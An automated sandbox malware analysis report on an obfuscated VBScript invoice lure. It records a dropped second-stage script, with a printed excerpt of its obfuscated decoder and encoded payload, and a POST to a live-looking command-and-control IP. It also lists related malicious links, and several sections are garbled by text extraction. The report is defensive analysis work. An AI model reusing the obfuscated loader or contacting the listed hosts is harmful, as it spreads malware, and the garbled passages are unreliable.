Automated Malware Analysis Report for Factura E 2903.Vbs

ID: 336297 Sample Name: factura_e_2903.vbs Cookbook: default.jbs Time: 18:49:12 Date: 05/01/2021 Version: 31.0.0 Red Diamond Table of Contents

Table of Contents 2 Analysis Report factura_e_2903.vbs 4 Overview 4 General Information 4 Detection 4 Signatures 4 Classification 4 Startup 4 Malware Configuration 4 Yara Overview 4 Sigma Overview 4 Signature Overview 4 AV Detection: 5 Data Obfuscation: 5 Persistence and Installation Behavior: 5 Malware Analysis System Evasion: 5 HIPS / PFW / Operating System Protection Evasion: 5 Mitre Att&ck Matrix 5 Behavior Graph 6 Screenshots 6 Thumbnails 6 Antivirus, Machine Learning and Genetic Malware Detection 7 Initial Sample 7 Dropped Files 7 Unpacked PE Files 7 Domains 7 URLs 7 Domains and IPs 8 Contacted Domains 8 Contacted URLs 8 URLs from Memory and Binaries 8 Contacted IPs 8 Public 9 General Information 9 Simulations 10 Behavior and APIs 10 Joe Sandbox View / Context 10 IPs 10 Domains 10 ASN 10 JA3 Fingerprints 10 Dropped Files 11 Created / dropped Files 11 Static File Info 11 General 11 File Icon 11 Network Behavior 12 TCP Packets 12 HTTP Request Dependency Graph 12 HTTP Packets 12 Code Manipulations 13 Statistics 13 Behavior 13 System Behavior 13 Analysis Process: wscript.exe PID: 6772 Parent PID: 3472 14 Copyright null 2021 Page 2 of 15 General 14 File Activities 14 File Created 14 File Written 14 Registry Activities 14 Analysis Process: wscript.exe PID: 6820 Parent PID: 6772 15 General 15 File Activities 15 Disassembly 15 Code Analysis 15

Overview

General Information Detection Signatures Classification

Sample factura_e_2903.vbs Name: Muullltttiii AAVV SSccaannnneerrr ddeettteecctttiiioonn fffoorrr ssuubbm…

Analysis ID: 336297 SMSyyusslttteie AmV pp Srrroocccaeenssnsse crc oodnnennteeccttttisos ntttoo f onnree stttwwuobormrr… MD5: b5d602542a401e… VSVByBsSStcecrrmriiipp ttpt prpoeecrrrfeffoosrrrsm csso onobnbffefuucsstcsca atttotee dnd e cctaawlllllolssr …

SHA1: a1a5fb11359fd6c… Ransomware QVBuueSerrrciiiereisps tss peeennrssfioiitttiirivvmee s BB oIIIObfSSu s IIIncnafffooterrrmd aacttatiiioollnsn … Miner Spreading SHA256: a1af774d09bdc8d… WQuiinneddroioewwss ss SeSnhhseeiltllil v SSecc rBriipIpOtt HSHo oIsnstft o ddrrmroopapstsi o VVnBB Wiiinnddoowwss SShheellllll SSccrrriiippttt HHoossttt ddrrrooppss VVBB… mmaallliiiccciiioouusss Most interesting Screenshot: malicious Evader Phishing

sssuusssppiiiccciiioouusss CWCooinndtttaaoiiinwnss ccSaahppeaalblb Siiillliiictttiiireeipss t t ttoHo oddseettt tedecrcottt pvvisiirrr tttVuuaBa… suspicious

cccllleeaann

clean CCrroreenaattatteeinss s aa c pparrrpooaccbeeislsistsi e iiinsn stsouu sdsppeeetenncddte evddi r mtuoao…

Exploiter Banker FCFooreuuanntdde sW aSS pHHr o tttiicimeeserrsr fffioonrrr s JJuaasvvpaaessnccdrrriiieppdttt oomrrr oVV…

IIFInnottteuerrnrnndee ttWt PPSrrroHovv itiididmeererr srs efeoeernn J iiainnv cacoosncnnrniepectc ttotiiioor nnV… Spyware Trojan / Bot

Adware JIJnaatvevaarn ///e VVt BPBSrSoccvrrriiipdptett frffi iillsleee wewniiittth hin vv eceorrryyn nlllooenncggti ossn… Score: 72 Range: 0 - 100 MJaoovnnaiiit tto/o rVrrssB ccSeecrrrtrttaiapiiintn f rrirleegg wiiissitttrrhryy v kkeeeryyss l o/// nvvgaa lllusu…

Whitelisted: false QMuouenerriritiieoesrss s sceeennrsstaiiitttiiivnve er e Ogppiseetrrrayat ttikiinneggy sSS y/y svsttateelmu … Confidence: 100% TQTrrruiiieessr i tettoos lllosoeaandds mitiiivissess iiiOnnggp eDDrLaLLtLisnsg System

UTUrssieess atao k klnonoaowdw nmn wiwsesebibn bgbr rrDoowLwLsseserrr uusseerrr aaggee…

Uses a known web browser user age Startup

System is w10x64 wscript.exe (PID: 6772 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\factura_e_2903.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) wscript.exe (PID: 6820 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\D68.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

• AV Detection • Networking Copyright null 2021 Page 4 of 15 • System Summary • Data Obfuscation • Persistence and Installation Behavior • Hooking and other Techniques for Hiding and Protection • Malware Analysis System Evasion • HIPS / PFW / Operating System Protection Evasion • Language, Device and Operating System Detection

Click to jump to signature section

AV Detection:

Multi AV Scanner detection for submitted file

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Persistence and Installation Behavior:

Windows Shell Script Host drops VBS files

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Mitre Att&ck Matrix

Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Valid Windows DLL Side- Process Masquerading 1 OS Query Registry 1 Remote Data from Exfiltration Ingress Tool Eavesdrop on Accounts Management Loading 1 Injection 1 1 1 Credential Services Local Over Other Transfer 1 Insecure Instrumentation 1 1 Dumping System Network Network Medium Communication Default Scripting 2 2 1 Boot or DLL Side- Virtualization/Sandbox LSASS Security Software Remote Data from Exfiltration Non- Exploit SS7 to Accounts Logon Loading 1 Evasion 2 Memory Discovery 2 1 Desktop Removable Over Application Redirect Phone Initialization Protocol Media Bluetooth Layer Calls/SMS Scripts Protocol 2 Domain PowerShell 1 Logon Script Logon Script Process Security Virtualization/Sandbox SMB/Windows Data from Automated Application Exploit SS7 to Accounts (Windows) (Windows) Injection 1 1 1 Account Evasion 2 Admin Shares Network Exfiltration Layer Track Device Manager Shared Protocol 1 2 Location Drive Local At (Windows) Logon Script Logon Script Scripting 2 2 1 NTDS File and Directory Distributed Input Scheduled Protocol SIM Card Accounts (Mac) (Mac) Discovery 1 Component Capture Transfer Impersonation Swap Object Model Cloud Cron Network Network Logon Obfuscated Files or LSA System Information SSH Keylogging Data Fallback Manipulate Accounts Logon Script Script Information 1 Secrets Discovery 1 1 2 Transfer Channels Device Size Limits Communication

Copyright null 2021 Page 5 of 15 Initial Privilege Credential Lateral Command Network Access Execution Persistence Escalation Defense Evasion Access Discovery Movement Collection Exfiltration and Control Effects Replication Launchd Rc.common Rc.common DLL Side-Loading 1 Cached System Owner/User VNC GUI Input Exfiltration Multiband Jamming or Through Domain Discovery Capture Over C2 Communication Denial of Removable Credentials Channel Service Media

Behavior Graph

Hide Legend Behavior Graph Legend: ID: 336297 Sample: factura_e_2903.vbs Process Startdate: 05/01/2021 Architecture: WINDOWS Signature Score: 72 Created File DNS/IP Info

Multi AV Scanner detection started Is Dropped for submitted file Is Windows Process

Number of created Registry Values wscript.exe Number of created Files

3 2 Visual Basic Delphi dropped Java

C:\Users\Public\D68.vbs, ASCII .Net C# or VB.NET

started C, C++ or other language Is malicious Queries sensitive BIOS VBScript performs obfuscated Information (via WMI, Windows Shell Script calls to suspicious Win32_Bios & Win32_BaseBoard, Host drops VBS files Internet functions often done to detect virtual machines)

wscript.exe

47.254.94.1, 49717, 80

CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States

System process connects to network (likely due to code injection or exploit)

Screenshots

Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Initial Sample

Source Detection Scanner Label Link factura_e_2903.vbs 27% Virustotal Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source Detection Scanner Label Link 47.254.94.1/m/t5o 1% Virustotal Browse 47.254.94.1/m/t5o 0% Avira URL Cloud safe 47.254.94.1/t5o( 0% Avira URL Cloud safe 47.254.94.1/ 1% Virustotal Browse

Copyright null 2021 Page 7 of 15 Source Detection Scanner Label Link 47.254.94.1/ 0% Avira URL Cloud safe 47.254.94.1/aj32.phpi 0% Avira URL Cloud safe 47.254.94.1/aj32.php 0% Avira URL Cloud safe 47.254.94.1/t5oa 0% Avira URL Cloud safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name Malicious Antivirus Detection Reputation 47.254.94.1/aj32.php true Avira URL Cloud: safe unknown

URLs from Memory and Binaries

Name Source Malicious Antivirus Detection Reputation 47.254.94.1/m/t5o wscript.exe, 00000001.00000003 false 1%, Virustotal, Browse unknown .258669650.000001E94A921000.00 Avira URL Cloud: safe 000004.00000001.sdmp 47.254.94.1/t5o( wscript.exe, 00000001.00000003 false Avira URL Cloud: safe unknown .269278795.000001E9483C5000.00 000004.00000001.sdmp 47.254.94.1/ wscript.exe, 00000001.00000003 false 1%, Virustotal, Browse unknown .258669650.000001E94A921000.00 Avira URL Cloud: safe 000004.00000001.sdmp, wscript.exe, 00000001.00000003.2531585 35.000001E94A922000.00000004.0 0000001.sdmp, wscript.exe, 000 00001.00000003.269278795.00000 1E9483C5000.00000004.00000001. sdmp 47.254.94.1/aj32.phpi wscript.exe, 00000001.00000003 false Avira URL Cloud: safe unknown .269278795.000001E9483C5000.00 000004.00000001.sdmp 47.254.94.1/t5oa wscript.exe, 00000001.00000003 false Avira URL Cloud: safe unknown .258669650.000001E94A921000.00 000004.00000001.sdmp, wscript.exe, 00000001.00000003.2597622 58.000001E9483DF000.00000004.0 0000001.sdmp

Contacted IPs

25% < No. of IPs < 50% 50% < No. of IPs < 75% 75% < No. of IPs

Public

IP Domain Country Flag ASN ASN Name Malicious 47.254.94.1 unknown United States 45102 CNNIC-ALIBABA-US-NET- true APAlibabaUSTechnologyCo LtdC

General Information

Joe Sandbox Version: 31.0.0 Red Diamond Analysis ID: 336297 Start date: 05.01.2021 Start time: 18:49:12 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 5m 2s Hypervisor based Inspection enabled: false Report type: light Sample file name: factura_e_2903.vbs Cookbook file name: default.jbs Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 Number of analysed new started processes analysed: 19 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies: HCA enabled EGA enabled HDC enabled AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: MAL Classification: mal72.evad.winVBS@3/1@0/1 EGA Information: Failed Copyright null 2021 Page 9 of 15 HDC Information: Failed HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 Cookbook Comments: Adjust boot time Enable AMSI Found application associated with file extension: .vbs Warnings: Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match Associated Sample Name / URL SHA 256 Detection Link Context CNNIC-ALIBABA-US-NET- chacagrabsterston.top Get hash malicious Browse 8.209.77.50 APAlibabaUSTechnologyCoLtdC SecuriteInfo.com.Trojan.GenericKD.35624799.30696.exe Get hash malicious Browse 47.57.139.0 sULC8E4jwy.exe Get hash malicious Browse 47.91.78.102 https://bit.ly/3mH4Noj Get hash malicious Browse 8.208.92.142 https://bitly.com/2KZhv4G Get hash malicious Browse 47.254.18.11 https://bit.ly/2L1Yyyv Get hash malicious Browse 8.208.92.142 Fe8noCCZ5Z.exe Get hash malicious Browse 47.91.95.232 DualSpace.apk Get hash malicious Browse 47.74.171.2 p5fcw.info/HI12cu33F5 Get hash malicious Browse 47.242.44.124 https://bit.ly/3pjmqfw Get hash malicious Browse 8.208.92.142 https://bit.ly/3mH4A4v Get hash malicious Browse 8.208.92.142 Order.doc Get hash malicious Browse 47.74.93.57 https://bit.ly/34CiZca Get hash malicious Browse 8.208.92.142 061.methodavoid.link/news Get hash malicious Browse 8.208.92.142 https://bit.ly/3rsMNSv Get hash malicious Browse 8.208.92.142 adjunto 86028707-97299.doc Get hash malicious Browse 47.242.12.81 https://bit.ly/3hcmaML Get hash malicious Browse 8.208.92.142 DOCUMENTO_MEDICO 047.doc Get hash malicious Browse 47.242.12.81 bit.ly/2KrM6Ih Get hash malicious Browse 8.208.92.142 p4fxv.info/D3c2Hp2HMI Get hash malicious Browse 47.242.44.124

JA3 Fingerprints

No context Copyright null 2021 Page 10 of 15 Dropped Files

No context

Created / dropped Files

C:\Users\Public\D68.vbs

Process: C:\Windows\System32\wscript.exe File Type: ASCII text, with very long lines, with no line terminators Category: dropped Size (bytes): 1413 Entropy (8bit): 5.229404960945602 Encrypted: false SSDEEP: 24:/Vokz3RxUFl8V+VDuAl8TxXCBi7ECrs6M6gHfEpksjfBjim0x1WAW5sIscoDROAR:/PDRGu557Emsj/EpksjfBjin1WAWzmZT MD5: 61132E385CD5755C0198948CAF89D8AD SHA1: EBFFBF349BBE0C2E88A8EFCBA9808DAF10A06F88 SHA-256: 1F1BA4DC3FABC14DF1426C6FA1B8E3476FAB1520734463D8698B0CD1886CAE94 SHA-512: A8E3212091E60C9F51043CC0060C40C7ECFE3C2FE0F84275D83180B9C5803049F0EA9D817EFD1D600A36AB1B190F0602EABFE1377242BA4D04AA0ADBFB1E64C C Malicious: true Reputation: low Preview: on error resume next:if ("dfg45gtsege4rtgdfg" <> "gtgedghdgdfgf") Then:w1=29:w1=w1+36:dim w2:w2=48:w2=w2+46:dim w3:w3=20:w3=w3+5:function chpped(bwdnr u):muqhbif=w2:wjinnmrel=asc(Mid(bwdnru,1,1))-w1:bwdnru=Mid(bwdnru,2,Len(bwdnru)-1):qgsey="":while(Len(bwdnru)>0)qgsey=qgsey&(Chr((((asc(Mid(bwdnru,1,1))- w1))*w3+(asc(Mid(bwdnru,2,1))-w1)-wjinnmrel-muqhbif))):bwdnru=Mid(bwdnru,3,Len(bwdnru)-2):wEnd:chpped=qgsey:end function:dim wk1:wk1="DHYIOIHHVINIC IIIHFEIKFVFMIKFXFNGFIKFWGIHTIMHVFMGYICHWFMIKFXFQFVFQFVFNFNFRGBGAGFIKFXGIGYICHWFMIKFXFQFWFQGXHXIHFMIKFXFNFRFVFN GFIKFYGIFGFGFGFGGFIQIBICIFHXFMGXHXIHFMIKFXFNGJFXFNIKFYGIIKFYFKFMGOIBILFMFMFMFMHTIMHVFMGYICHWFMIKFXFQFVFQFVFNFN FRGBGAFNFNFOFWGAFPFMHTIMHVFMGYICHWFMIKFXFQFWFQFVFNFNFRGBGAFNFRIKFWFRGEFYFNFNFNGFIKFXGIGYICHWFMIKFXFQFXFQGXHXIH FMIKFXFNFRFWFNGFIQGQIHHWGFIKFVGIIKFYGFHXIHHWFEHYIOIHHVINICIIIHGFIMHXINFEIIGTGIFEGOILHXHTINHXHBHUIDHXHVINFMFGFGGYICHVILII IMIIHYINFSHKGYGXGTHGHGHCFGFGFNGFIIGTFSIIIJHXIHFEFGFGIJIIIMINFGFGFQFEFGFGIBININIJGFFTFTFYGCFSFWGAFYFS

Static File Info

General File type: ASCII text, with CRLF line terminators Entropy (8bit): 5.550794909925798 TrID: 669 Tracker Module (2002/1) 100.00% File name: factura_e_2903.vbs File size: 8775 MD5: b5d602542a401efb4ecf2bd860bcb9e9 SHA1: a1a5fb11359fd6c3d5cc27f96598b66e9de565cc SHA256: a1af774d09bdc8d7e082023c41516fafb61134aa40dbcbe 84588ac698181c392 SHA512: bb17af0ad5b22d589bbd6febb3d11477bf1d6b053c58264 ad2cb35e72240d0e931cb848458d731a0d63bf48bc7222 49db7efae11591ec2792c32581dbf6edef1 SSDEEP: 192:mmnrFjA79ok/JW7DCN1KyFL/fXqMP8s9uLyggCG 7bnVbC:mmndE/JW7DCrbFL/fXqMP8s9uLNgNVbC File Content Preview: if ("s6e" <> "ke51") then..js62618 = "d7x84sjkg5ailqjo14 bb"..if ("rx0g0t5j5pude4lh6o" <> "ne3with3bodk63q3581 17h3") then..iqt80103 = "yp"..if ("teb53" <> "myc") then.. fi776292 = "fsaqgm43b"..if ("xjr14ohr4kd3piyf2kao" <> " hm6p") then..dx8pp6yyik14546 = "m

File Icon

Icon Hash: e8d69ece869a9ec4

TCP Packets

Timestamp Source Port Dest Port Source IP Dest IP Jan 5, 2021 18:50:01.436784029 CET 49717 80 192.168.2.5 47.254.94.1 Jan 5, 2021 18:50:01.632327080 CET 80 49717 47.254.94.1 192.168.2.5 Jan 5, 2021 18:50:01.633233070 CET 49717 80 192.168.2.5 47.254.94.1 Jan 5, 2021 18:50:01.633608103 CET 49717 80 192.168.2.5 47.254.94.1 Jan 5, 2021 18:50:01.635174990 CET 49717 80 192.168.2.5 47.254.94.1 Jan 5, 2021 18:50:01.831398964 CET 80 49717 47.254.94.1 192.168.2.5 Jan 5, 2021 18:50:01.831434965 CET 80 49717 47.254.94.1 192.168.2.5 Jan 5, 2021 18:50:01.832021952 CET 80 49717 47.254.94.1 192.168.2.5 Jan 5, 2021 18:50:01.832062006 CET 80 49717 47.254.94.1 192.168.2.5 Jan 5, 2021 18:50:01.832098007 CET 80 49717 47.254.94.1 192.168.2.5 Jan 5, 2021 18:50:01.832134962 CET 80 49717 47.254.94.1 192.168.2.5 Jan 5, 2021 18:50:01.832169056 CET 80 49717 47.254.94.1 192.168.2.5 Jan 5, 2021 18:50:01.832199097 CET 49717 80 192.168.2.5 47.254.94.1 Jan 5, 2021 18:50:01.832215071 CET 49717 80 192.168.2.5 47.254.94.1 Jan 5, 2021 18:50:01.832221031 CET 49717 80 192.168.2.5 47.254.94.1 Jan 5, 2021 18:50:01.833219051 CET 49717 80 192.168.2.5 47.254.94.1 Jan 5, 2021 18:50:06.836005926 CET 80 49717 47.254.94.1 192.168.2.5 Jan 5, 2021 18:50:06.836106062 CET 49717 80 192.168.2.5 47.254.94.1 Jan 5, 2021 18:50:23.554717064 CET 49717 80 192.168.2.5 47.254.94.1

HTTP Request Dependency Graph

47.254.94.1

HTTP Packets

Session ID Source IP Source Port Destination IP Destination Port Process 0 192.168.2.5 49717 47.254.94.1 80 C:\Windows\System32\wscript.exe

kBytes Timestamp transferred Direction Data Jan 5, 2021 26 OUT POST /aj32.php HTTP/1.1 18:50:01.633608103 CET Accept: */* Content-Type: application/x-www-form-urlencoded Accept-Language: en-us UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 47.254.94.1 Content-Length: 3 Connection: Keep-Alive Cache-Control: no-cache

Copyright null 2021 Page 12 of 15 kBytes Timestamp transferred Direction Data Jan 5, 2021 28 IN HTTP/1.1 200 OK 18:50:01.832021952 CET Date: Tue, 05 Jan 2021 17:50:01 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 6155 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 3d 69 6e eb 3c 8c ff 07 98 3b cc 55 12 27 5a ec 24 b5 9d 66 bb ff 45 86 9b 56 4b 5e da f4 bd 87 0f 45 d0 c6 b1 25 6e a2 28 8a a2 64 63 cf f6 a4 ac 6d 6c 0f 9f b3 ed e1 ba 87 5f 83 bd da ce 36 f0 eb 04 bf ee 76 3c 7e 1c 4f f1 9f dd 61 4d 28 37 2a 0b a5 76 fa 6a 94 fe c4 6b 65 f5 19 fe ac 3e 14 cb bd b8 14 96 51 9d de ab ae 50 6a 30 16 7e b7 b6 31 1f a1 2c 5c 8c f0 b9 e8 56 3d d5 53 1f b4 56 0f bd d7 47 7d 80 6f 4b ff 77 ea 69 47 7d b4 67 f3 5c 82 6b 2e 80 7b 2b ec ce c1 2f 42 bf 01 64 0d bf ad be 6f 85 5c 84 b7 33 d6 3c 01 e2 13 4a 38 79 5d 75 6b ae 06 cb 60 8b 0d 70 ad ed d5 bc 08 f3 ce 5c 2b 70 3e f4 d3 41 50 0f 80 69 74 53 2b 69 86 50 d2 22 f6 4b a5 e4 05 34 64 d0 0d 6a 8c 70 5a 97 cc ce 80 cc ed c9 34 d8 32 76 ef 6b 5c 80 87 23 48 e7 50 ae a5 af 28 46 6a af 17 fc 3d f1 99 97 c4 ae dc 06 e6 cc 92 81 7a a4 d9 ae b4 3e ae 29 af 07 a0 e9 b2 0d 87 1e cc c9 74 db ea 98 b3 1e 4d bb 11 cf 0d 5a 67 11 0f c8 ec 64 0f f6 18 69 cc d5 18 f8 ff c4 fa 70 0d da a9 6f 70 7d 82 6f fe e0 3d 7c 7e d5 83 dc bf d2 b5 bb 77 37 3b be 07 3d bc 7c 5f 57 ee 1b 7f ff 4e f8 35 3c db 33 1c 7c 06 7d 10 74 59 68 eb a1 cc 83 9e df 4c 0b 7f 07 b8 6e a4 ee 95 7e 33 6d 48 a3 21 5e a8 0e c1 03 fc e6 28 df 08 db dd 6b 88 3f 2c 8f 3c df c1 f6 70 dd a3 7c f3 7d 2c 77 83 7a 77 3d 12 cc af e3 34 82 73 a4 3a c8 cf c d 74 8c 07 64 82 b0 6e 20 6b fc 2e e1 24 9e 89 5e ed bf b9 7c f8 e6 fb d6 3f 67 9c d6 f3 8b f8 18 ff 95 e5 09 d7 81 a6 1b c9 96 f9 0b f0 6b d7 0c cf e9 8b 91 3f 4d ed c2 32 39 10 ed cc 97 12 fa 06 d1 a9 29 ce 98 7e 77 bd 8e 8e 76 a6 2d ad f0 79 2d ca f4 4a f2 cf e5 97 e2 c0 fa 57 81 c3 b2 34 02 ab 15 1e 1e 13 de 98 df 4e 70 9c 84 a6 fb 84 76 96 d1 9c 2e f6 99 8e 29 91 d9 c1 f3 76 f5 f2 36 fc 9b 70 9e 23 dd 68 23 59 39 7d 98 93 59 27 f0 3f 04 c6 47 a4 9b a6 22 c7 4b 22 37 c7 6b c0 d5 b1 ee 89 0e d6 71 2b 91 e9 33 ea 23 c6 cb 8f db f2 26 f4 5c 66 e8 51 d4 ff 98 17 1b fd 76 72 6f b3 7e f2 13 32 51 f4 c7 65 2e 05 7c 5a 70 1a 4f cf 6d 63 3f 65 1c 3a a9 1f 78 ec 84 b6 d6 b7 fb bc ec 97 fa 8a 12 5a a7 7a c5 d7 2c 6b b2 cb 62 1f de 2b 4b bb 0a b7 ef af 44 47 8d 86 93 c8 51 cd e0 6b ab 36 87 c7 88 d0 5e 35 3e 59 9e 4b 32 65 1b 14 db be 58 47 73 3e df 6f 2b 14 d9 a8 d2 f8 31 c5 af 17 69 f0 63 7b 95 df 92 6d 6a 33 19 2c c9 f6 9d 76 e2 92 f0 17 6c 7c 5b a0 73 de 56 cf f3 ae 0b 36 28 ee bb ee bb d3 65 1d 70 36 dc 8d bd 47 df be 4c cf 29 ea 4b 07 29 d3 33 ef 1e bf ca f4 2c f8 14 31 4d 61 ac 7b 67 1f d6 99 ad ea 3c ec 54 ce f1 b8 51 c3 df ea e0 5f cc e1 ab d9 2b d1 7f c2 d1 8a 6d 99 b7 ff cb 7d 59 47 36 2a d8 a4 69 bf 72 df 75 7c ec 5f 9e 04 c7 7d 06 5f 5b 80 1f f7 db 4e df 22 3b f6 6e db f1 eb 7b ff fa de bf be f7 af ef fd eb 7b ff fa de bf be f7 af ef fd eb 7b ff fa de bf be f7 af ef fd eb 7b ff fa de bf be f7 af ef fd 1f f0 bd 79 1d d5 fd e9 bb c5 15 d4 9d 1d fd 0a f2 c3 36 76 34 17 db 59 6d 34 65 49 5c 68 5d 76 b4 0f 83 eb d9 2d d4 68 d4 80 6b b0 b6 37 47 b8 d3 d9 c6 b4 f6 02 57 3b 78 72 c3 cc 03 7c a6 af b6 85 7b 50 d2 95 0a cf 26 90 5d 09 9f 79 c1 b9 15 ca 1a 45 54 dd 42 c6 86 b1 71 c6 86 39 a6 19 1b ae 5e 05 4f e0 c0 ad fb 77 59 ad 06 d7 96 ed 99 25 10 78 e0 f2 16 b1 8d f0 f4 05 64 34 28 37 35 a8 ce de 28 13 a2 83 a7 1d 3c 1d 74 0b 70 ad fa f0 54 4c a5 34 aa 07 c3 72 92 2c 4a eb c3 2a bd 57 2f f9 e0 Data Ascii: =in<;U'Z$fEVK^E%n(dcml_6v<~OaM(7*vjke>QPj0~1,\V=SVG}oKwiG}g\k.{+/Bdo\3APitS +iP"K4djpZ42vk\#HP(Fj=z>)tMZgdipop}o=|~w7;=|_WN5<3|}tYhLn~3mH!^(k?,YK2eXGs>o+1ic{mj3,vl|[sV6(ep6GL )K)3,1Ma{g

Code Manipulations

Statistics

Behavior

• wscript.exe • wscript.exe

Click to jump to process

System Behavior

General

Start time: 18:49:58 Start date: 05/01/2021 Path: C:\Windows\System32\wscript.exe Wow64 process (32bit): false Commandline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\factura_e_2903.vbs' Imagebase: 0x7ff670950000 File size: 163840 bytes MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities

File Created

Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\Public\D68.vbs read attributes | device synchronous io success or wait 1 7FFA8A4B1571 CreateFileW synchronize | non alert | non generic write directory file

File Written

Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\Public\D68.vbs unknown 1413 6f 6e 20 65 72 72 6f on error resume next:if success or wait 1 7FFA8A4BE70B WriteFile 72 20 72 65 73 75 6d ("dfg45gtsege4rtgdfg" <> 65 20 6e 65 78 74 3a "gtgedghdgdfgf") 69 66 20 28 22 64 66 Then:w1=29:w1=w1+36:di 67 34 35 67 74 73 65 m 67 65 34 72 74 67 64 w2:w2=48:w2=w2+46:dim 66 67 22 20 3c 3e 20 w3:w3=20 22 67 74 67 65 64 67 :w3=w3+5:function 68 64 67 64 66 67 66 chpped(bwdnr 22 29 20 54 68 65 6e u):muqhbif=w2:wjinnmrel= 3a 77 31 3d 32 39 3a asc(Mid(bwdnru,1,1))- 77 31 3d 77 31 2b 33 w1:bwdnru=Mid(b 36 3a 64 69 6d 20 77 wdnru,2,Len(bwdnru)- 32 3a 77 32 3d 34 38 1):qgsey="":while(Len(bwd 3a 77 32 3d 77 32 2b 34 36 3a 64 69 6d 20 77 33 3a 77 33 3d 32 30 3a 77 33 3d 77 33 2b 35 3a 66 75 6e 63 74 69 6f 6e 20 63 68 70 70 65 64 28 62 77 64 6e 72 75 29 3a 6d 75 71 68 62 69 66 3d 77 32 3a 77 6a 69 6e 6e 6d 72 65 6c 3d 61 73 63 28 4d 69 64 28 62 77 64 6e 72 75 2c 31 2c 31 29 29 2d 77 31 3a 62 77 64 6e 72 75 3d 4d 69 64 28 62 77 64 6e 72 75 2c 32 2c 4c 65 6e 28 62 77 64 6e 72 75 29 2d 31 29 3a 71 67 73 65 79 3d 22 22 3a 77 68 69 6c 65 28 4c 65 6e 28 62 77 64

Source File Path Offset Length Completion Count Address Symbol

Registry Activities

Analysis Process: wscript.exe PID: 6820 Parent PID: 6772

General

Start time: 18:49:59 Start date: 05/01/2021 Path: C:\Windows\System32\wscript.exe Wow64 process (32bit): false Commandline: 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\D68.vbs' Imagebase: 0x7ff670950000 File size: 163840 bytes MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol

Source File Path Offset Length Completion Count Address Symbol

Disassembly

Code Analysis